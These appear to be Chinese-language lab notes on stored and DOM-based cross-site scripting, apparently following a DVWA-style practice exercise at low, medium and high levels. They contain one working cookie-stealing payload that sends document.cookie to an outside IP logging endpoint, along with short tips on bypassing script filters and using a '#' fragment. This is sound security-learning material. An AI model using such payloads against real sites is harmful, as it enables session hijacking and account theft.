存储型原理图及原理
弹窗:
原理:1、攻击者向服务器提交一段js代码
2、服务器保存js代码并将结果返回给攻击者
3、受害者访问服务器
4、服务器将js代码传给受害者,受害者电脑出现弹窗
Cookie:
原理:1、攻击者向服务器提交一段js代码
2、服务器保存js代码并将结果返回给攻击者
3、受害者访问服务器
4、服务器将js代码传给受害者
5、受害者电脑将cookie值发送给攻击者
重定向:
原理:1、攻击者向服务器提交一段js代码
2、服务器保存js代码并将结果返回给攻击者
3、受害者访问服务器
4、服务器将js代码传给受害者
5、受害者电脑自动跳转到攻击者指定的网页
DOM型 XSS
低
源码没有限制,在搜索框中修改值即可
弹窗:
Cookie:
<script>var img=document.createElement(‘img’);img.src=’http://192.168.116.161:88/log?’+escape(document.cookie);</script>
重定向:
中
源码对script进行了过滤
因此我们需要提前闭合标签
弹窗:
Cookie:
高
源码对非默认语言全部默认为英语
这里我们需要用到#绕过,作用就是#后面的内容不提交给服务器。其余步骤与低级一样